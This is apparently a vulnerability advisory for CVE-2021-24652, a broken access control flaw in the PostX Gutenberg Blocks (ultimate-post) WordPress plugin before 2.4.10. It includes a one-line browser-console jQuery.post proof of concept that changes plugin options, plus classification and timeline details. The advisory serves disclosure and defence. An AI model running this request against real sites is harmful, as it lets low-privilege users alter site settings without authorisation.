PostX Gutenberg Blocks for Post Grid < 2.4.10 – Missing Access Controls | CVE 2021-24652

Description

The plugin performs incorrect checks before allowing any logged in user to perform some ajax based requests, allowing any user to modify, delete or add ultp_options values.

Proof of Concept

You can run this from a browser's javascript console:  jQuery.post(ajaxurl,{action:"ultp_addon",addon:"ultp_templates",value:"false",wpnonce:"a"})

Affects Plugins

ultimate-post

Fixed in 2.4.10

References

CVE

CVE-2021-24652

Classification

Type

ACCESS CONTROLS

OWASP top 10

A5: Broken Access Control

CWE

CWE-284

CVSS

4.3 (medium)

Miscellaneous

Original Researcher

apple502j

Submitter

apple502j

Verified

Yes

WPVDB ID

5375bd3e-a30d-4f24-9b17-470b28a8231c

Timeline

Publicly Published

2021-08-17 (about 4 years ago)

Added

2021-08-26 (about 4 years ago)

Last Updated

2023-01-27 (about 2 years ago)

Other

Published

Title

Published

2024-02-19

Title

Coming Soon Maintenance Mode < 1.0.6 - Information Exposure

Published

2021-06-04

Title

Social Sharing Plugin - Kiwi 2.1.0 - Unauthenticated Arbitrary WordPress Options Update and Read

Published

2020-09-25

Title

Simple:Press < 6.6.1 - Broken Access Control leading to RCE

Published

2021-07-12

Title

Advanced Menu Manager < 3.0.7 - Unauthorised Menu Creation/Deletion

Published

2022-01-04

Title

Advanced Cron Manager - Subscriber+ Arbitrary Events/Schedules Creation/Deletion